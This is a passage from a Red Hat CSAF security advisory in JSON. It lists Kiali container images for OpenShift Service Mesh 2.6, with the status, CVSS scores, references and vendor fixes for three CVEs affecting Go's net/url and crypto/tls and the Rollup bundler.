"relates_to_product_reference": "Red Hat OpenShift Service Mesh 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:c37bc564685eacc236f7e9a3df6a9b3f0c1ee4bcaa0ee52ec42df6a27e4e4339_amd64 as a component of Red Hat OpenShift Service Mesh 2.6",
"product_id": "Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:c37bc564685eacc236f7e9a3df6a9b3f0c1ee4bcaa0ee52ec42df6a27e4e4339_amd64"
},
"product_reference": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:c37bc564685eacc236f7e9a3df6a9b3f0c1ee4bcaa0ee52ec42df6a27e4e4339_amd64",
"relates_to_product_reference": "Red Hat OpenShift Service Mesh 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:5a8a46e92a178be088251e0dcb67612d16bafeee910af6bd55de82a4727daa02_amd64 as a component of Red Hat OpenShift Service Mesh 2.6",
"product_id": "Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:5a8a46e92a178be088251e0dcb67612d16bafeee910af6bd55de82a4727daa02_amd64"
},
"product_reference": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:5a8a46e92a178be088251e0dcb67612d16bafeee910af6bd55de82a4727daa02_amd64",
"relates_to_product_reference": "Red Hat OpenShift Service Mesh 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6487d8be05cb57a356dd53769f93c84d0abb3729ce1b39041c4d02247ad8e771_ppc64le as a component of Red Hat OpenShift Service Mesh 2.6",
"product_id": "Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6487d8be05cb57a356dd53769f93c84d0abb3729ce1b39041c4d02247ad8e771_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6487d8be05cb57a356dd53769f93c84d0abb3729ce1b39041c4d02247ad8e771_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Service Mesh 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6c91551425148cad302317d8aac839b04e95dc7ecdf02cb8bddf4aaa87dcd550_arm64 as a component of Red Hat OpenShift Service Mesh 2.6",
"product_id": "Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6c91551425148cad302317d8aac839b04e95dc7ecdf02cb8bddf4aaa87dcd550_arm64"
},
"product_reference": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6c91551425148cad302317d8aac839b04e95dc7ecdf02cb8bddf4aaa87dcd550_arm64",
"relates_to_product_reference": "Red Hat OpenShift Service Mesh 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:a51a1b8587c6d4d63ba802112dd8b4a79d87a8af8dbf5341a3e5e917cae437dd_s390x as a component of Red Hat OpenShift Service Mesh 2.6",
"product_id": "Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:a51a1b8587c6d4d63ba802112dd8b4a79d87a8af8dbf5341a3e5e917cae437dd_s390x"
},
"product_reference": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:a51a1b8587c6d4d63ba802112dd8b4a79d87a8af8dbf5341a3e5e917cae437dd_s390x",
"relates_to_product_reference": "Red Hat OpenShift Service Mesh 2.6"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-61726",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-01-28T20:01:42.791305+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:5bccd71519ece8217238731eec2d8aea226b53403e111113e94086d0695a1619_s390x",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:708f623ecd4790488b9377dac0417ce9c99e52a350a5d387722608beb54d5a63_arm64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:af899fd57742510613433c8d9dab94989f4c5c9f7f3631985e4e8296a5781ea2_ppc64le",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:c37bc564685eacc236f7e9a3df6a9b3f0c1ee4bcaa0ee52ec42df6a27e4e4339_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2434432"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the net/url package in the Go standard library. The package does not enforce a limit on the number of unique query parameters it parses. A Go application using the net/http.Request.ParseForm method will try to process all parameters provided in the request. A specially crafted HTTP request containing a massive number of query parameters will cause the application to consume an excessive amount of memory, eventually causing the application to crash or become unresponsive, resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: net/url: Memory exhaustion in query parameter parsing in net/url",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this flaw, an attacker must be able to send a specially crafted HTTP request to an application parsing URL-encoded forms with net/url, specifically a request containing a large number of unique query parameters. The request will cause the application to consume an excessive amount of memory and eventually result in a denial of service, with no impact to confidentiality or integrity. Due to this reason, this vulnerability has been rated with an important severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:5a8a46e92a178be088251e0dcb67612d16bafeee910af6bd55de82a4727daa02_amd64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6487d8be05cb57a356dd53769f93c84d0abb3729ce1b39041c4d02247ad8e771_ppc64le",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6c91551425148cad302317d8aac839b04e95dc7ecdf02cb8bddf4aaa87dcd550_arm64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:a51a1b8587c6d4d63ba802112dd8b4a79d87a8af8dbf5341a3e5e917cae437dd_s390x"
],
"known_not_affected": [
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:5bccd71519ece8217238731eec2d8aea226b53403e111113e94086d0695a1619_s390x",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:708f623ecd4790488b9377dac0417ce9c99e52a350a5d387722608beb54d5a63_arm64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:af899fd57742510613433c8d9dab94989f4c5c9f7f3631985e4e8296a5781ea2_ppc64le",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:c37bc564685eacc236f7e9a3df6a9b3f0c1ee4bcaa0ee52ec42df6a27e4e4339_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-61726"
},
{
"category": "external",
"summary": "RHBZ#2434432",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2434432"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-61726",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61726"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-61726",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61726"
},
{
"category": "external",
"summary": "https://go.dev/cl/736712",
"url": "https://go.dev/cl/736712"
},
{
"category": "external",
"summary": "https://go.dev/issue/77101",
"url": "https://go.dev/issue/77101"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc",
"url": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4341",
"url": "https://pkg.go.dev/vuln/GO-2026-4341"
}
],
"release_date": "2026-01-28T19:30:31.215000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-19T14:09:55+00:00",
"details": "See Kiali 1.73.28 documentation at https://docs.redhat.com/en/documentation/openshift_container_platform/4.18/html/service_mesh/service-mesh-2-x",
"product_ids": [
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:5a8a46e92a178be088251e0dcb67612d16bafeee910af6bd55de82a4727daa02_amd64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6487d8be05cb57a356dd53769f93c84d0abb3729ce1b39041c4d02247ad8e771_ppc64le",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6c91551425148cad302317d8aac839b04e95dc7ecdf02cb8bddf4aaa87dcd550_arm64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:a51a1b8587c6d4d63ba802112dd8b4a79d87a8af8dbf5341a3e5e917cae437dd_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5132"
},
{
"category": "workaround",
"details": "Red Hat has investigated whether a possible mitigation exists for this issue, and has not been able to identify a practical example. Please update the affected package as soon as possible.",
"product_ids": [
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:5bccd71519ece8217238731eec2d8aea226b53403e111113e94086d0695a1619_s390x",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:708f623ecd4790488b9377dac0417ce9c99e52a350a5d387722608beb54d5a63_arm64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:af899fd57742510613433c8d9dab94989f4c5c9f7f3631985e4e8296a5781ea2_ppc64le",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:c37bc564685eacc236f7e9a3df6a9b3f0c1ee4bcaa0ee52ec42df6a27e4e4339_amd64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:5a8a46e92a178be088251e0dcb67612d16bafeee910af6bd55de82a4727daa02_amd64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6487d8be05cb57a356dd53769f93c84d0abb3729ce1b39041c4d02247ad8e771_ppc64le",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6c91551425148cad302317d8aac839b04e95dc7ecdf02cb8bddf4aaa87dcd550_arm64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:a51a1b8587c6d4d63ba802112dd8b4a79d87a8af8dbf5341a3e5e917cae437dd_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:5bccd71519ece8217238731eec2d8aea226b53403e111113e94086d0695a1619_s390x",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:708f623ecd4790488b9377dac0417ce9c99e52a350a5d387722608beb54d5a63_arm64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:af899fd57742510613433c8d9dab94989f4c5c9f7f3631985e4e8296a5781ea2_ppc64le",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:c37bc564685eacc236f7e9a3df6a9b3f0c1ee4bcaa0ee52ec42df6a27e4e4339_amd64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:5a8a46e92a178be088251e0dcb67612d16bafeee910af6bd55de82a4727daa02_amd64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6487d8be05cb57a356dd53769f93c84d0abb3729ce1b39041c4d02247ad8e771_ppc64le",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6c91551425148cad302317d8aac839b04e95dc7ecdf02cb8bddf4aaa87dcd550_arm64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:a51a1b8587c6d4d63ba802112dd8b4a79d87a8af8dbf5341a3e5e917cae437dd_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "golang: net/url: Memory exhaustion in query parameter parsing in net/url"
},
{
"cve": "CVE-2025-68121",
"discovery_date": "2026-02-05T18:01:30.086058+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:5bccd71519ece8217238731eec2d8aea226b53403e111113e94086d0695a1619_s390x",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:708f623ecd4790488b9377dac0417ce9c99e52a350a5d387722608beb54d5a63_arm64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:af899fd57742510613433c8d9dab94989f4c5c9f7f3631985e4e8296a5781ea2_ppc64le",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:c37bc564685eacc236f7e9a3df6a9b3f0c1ee4bcaa0ee52ec42df6a27e4e4339_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2437111"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the crypto/tls component. This vulnerability occurs during Transport Layer Security (TLS) session resumption when certificate authority (CA) settings are modified between the initial and resumed handshakes. An attacker could exploit this to bypass certificate validation, allowing a client or server to establish a connection that should have been rejected. This could lead to an authentication bypass under specific conditions.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "crypto/tls: crypto/tls: Incorrect certificate validation during TLS session resumption",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is a moderate flaw because it only occurs under specific conditions, such as TLS session resumption with runtime changes to certificate authority settings. Exploitation is not straightforward and requires a controlled setup. The impact is limited to certificate validation within the same component and does not affect system availability.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:5a8a46e92a178be088251e0dcb67612d16bafeee910af6bd55de82a4727daa02_amd64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6487d8be05cb57a356dd53769f93c84d0abb3729ce1b39041c4d02247ad8e771_ppc64le",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6c91551425148cad302317d8aac839b04e95dc7ecdf02cb8bddf4aaa87dcd550_arm64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:a51a1b8587c6d4d63ba802112dd8b4a79d87a8af8dbf5341a3e5e917cae437dd_s390x"
],
"known_not_affected": [
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:5bccd71519ece8217238731eec2d8aea226b53403e111113e94086d0695a1619_s390x",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:708f623ecd4790488b9377dac0417ce9c99e52a350a5d387722608beb54d5a63_arm64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:af899fd57742510613433c8d9dab94989f4c5c9f7f3631985e4e8296a5781ea2_ppc64le",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:c37bc564685eacc236f7e9a3df6a9b3f0c1ee4bcaa0ee52ec42df6a27e4e4339_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-68121"
},
{
"category": "external",
"summary": "RHBZ#2437111",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2437111"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-68121",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68121"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-68121",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68121"
},
{
"category": "external",
"summary": "https://go.dev/cl/737700",
"url": "https://go.dev/cl/737700"
},
{
"category": "external",
"summary": "https://go.dev/issue/77217",
"url": "https://go.dev/issue/77217"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/K09ubi9FQFk",
"url": "https://groups.google.com/g/golang-announce/c/K09ubi9FQFk"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4337",
"url": "https://pkg.go.dev/vuln/GO-2026-4337"
}
],
"release_date": "2026-02-05T17:48:44.141000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-19T14:09:55+00:00",
"details": "See Kiali 1.73.28 documentation at https://docs.redhat.com/en/documentation/openshift_container_platform/4.18/html/service_mesh/service-mesh-2-x",
"product_ids": [
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:5a8a46e92a178be088251e0dcb67612d16bafeee910af6bd55de82a4727daa02_amd64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6487d8be05cb57a356dd53769f93c84d0abb3729ce1b39041c4d02247ad8e771_ppc64le",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6c91551425148cad302317d8aac839b04e95dc7ecdf02cb8bddf4aaa87dcd550_arm64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:a51a1b8587c6d4d63ba802112dd8b4a79d87a8af8dbf5341a3e5e917cae437dd_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5132"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:5bccd71519ece8217238731eec2d8aea226b53403e111113e94086d0695a1619_s390x",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:708f623ecd4790488b9377dac0417ce9c99e52a350a5d387722608beb54d5a63_arm64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:af899fd57742510613433c8d9dab94989f4c5c9f7f3631985e4e8296a5781ea2_ppc64le",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:c37bc564685eacc236f7e9a3df6a9b3f0c1ee4bcaa0ee52ec42df6a27e4e4339_amd64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:5a8a46e92a178be088251e0dcb67612d16bafeee910af6bd55de82a4727daa02_amd64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6487d8be05cb57a356dd53769f93c84d0abb3729ce1b39041c4d02247ad8e771_ppc64le",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6c91551425148cad302317d8aac839b04e95dc7ecdf02cb8bddf4aaa87dcd550_arm64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:a51a1b8587c6d4d63ba802112dd8b4a79d87a8af8dbf5341a3e5e917cae437dd_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "crypto/tls: crypto/tls: Incorrect certificate validation during TLS session resumption"
},
{
"cve": "CVE-2026-27606",
"cwe": {
"id": "CWE-22",
"name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
},
"discovery_date": "2026-02-25T04:01:24.449922+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:5bccd71519ece8217238731eec2d8aea226b53403e111113e94086d0695a1619_s390x",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:708f623ecd4790488b9377dac0417ce9c99e52a350a5d387722608beb54d5a63_arm64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:af899fd57742510613433c8d9dab94989f4c5c9f7f3631985e4e8296a5781ea2_ppc64le",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:c37bc564685eacc236f7e9a3df6a9b3f0c1ee4bcaa0ee52ec42df6a27e4e4339_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2442530"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Rollup, a JavaScript module bundler. Insecure file name sanitization in the core engine allows an attacker to control output filenames, potentially through command-line interface (CLI) inputs, manual chunk aliases, or malicious plugins. By using directory traversal sequences (`../`), an attacker can overwrite files anywhere on the host filesystem where the build process has write permissions. This vulnerability can lead to persistent remote code execution (RCE) by overwriting critical system or user configuration files.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "rollup: Rollup: Remote Code Execution via Path Traversal Vulnerability",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:5a8a46e92a178be088251e0dcb67612d16bafeee910af6bd55de82a4727daa02_amd64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6487d8be05cb57a356dd53769f93c84d0abb3729ce1b39041c4d02247ad8e771_ppc64le",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6c91551425148cad302317d8aac839b04e95dc7ecdf02cb8bddf4aaa87dcd550_arm64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:a51a1b8587c6d4d63ba802112dd8b4a79d87a8af8dbf5341a3e5e917cae437dd_s390x"
],
"known_not_affected": [
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:5bccd71519ece8217238731eec2d8aea226b53403e111113e94086d0695a1619_s390x",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:708f623ecd4790488b9377dac0417ce9c99e52a350a5d387722608beb54d5a63_arm64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:af899fd57742510613433c8d9dab94989f4c5c9f7f3631985e4e8296a5781ea2_ppc64le",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:c37bc564685eacc236f7e9a3df6a9b3f0c1ee4bcaa0ee52ec42df6a27e4e4339_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27606"
},
{
"category": "external",
"summary": "RHBZ#2442530",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442530"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27606",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27606"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27606",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27606"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/commit/c60770d7aaf750e512c1b2774989ea4596e660b2",
"url": "https://github.com/rollup/rollup/commit/c60770d7aaf750e512c1b2774989ea4596e660b2"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/commit/c8cf1f9c48c516285758c1e11f08a54f304fd44e",
"url": "https://github.com/rollup/rollup/commit/c8cf1f9c48c516285758c1e11f08a54f304fd44e"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/commit/d6dee5e99bb82aac0bee1df4ab9efbde455452c3",
"url": "https://github.com/rollup/rollup/commit/d6dee5e99bb82aac0bee1df4ab9efbde455452c3"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/releases/tag/v2.80.0",
"url": "https://github.com/rollup/rollup/releases/tag/v2.80.0"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/releases/tag/v3.30.0",
"url": "https://github.com/rollup/rollup/releases/tag/v3.30.0"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/releases/tag/v4.59.0",
"url": "https://github.com/rollup/rollup/releases/tag/v4.59.0"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/security/advisories/GHSA-mw96-cpmx-2vgc",
"url": "https://github.com/rollup/rollup/security/advisories/GHSA-mw96-cpmx-2vgc"
}
],
"release_date": "2026-02-25T02:08:06.682000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-19T14:09:55+00:00",
"details": "See Kiali 1.73.28 documentation at https://docs.redhat.com/en/documentation/openshift_container_platform/4.18/html/service_mesh/service-mesh-2-x",
"product_ids": [
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:5a8a46e92a178be088251e0dcb67612d16bafeee910af6bd55de82a4727daa02_amd64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6487d8be05cb57a356dd53769f93c84d0abb3729ce1b39041c4d02247ad8e771_ppc64le",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6c91551425148cad302317d8aac839b04e95dc7ecdf02cb8bddf4aaa87dcd550_arm64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:a51a1b8587c6d4d63ba802112dd8b4a79d87a8af8dbf5341a3e5e917cae437dd_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5132"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:5bccd71519ece8217238731eec2d8aea226b53403e111113e94086d0695a1619_s390x",
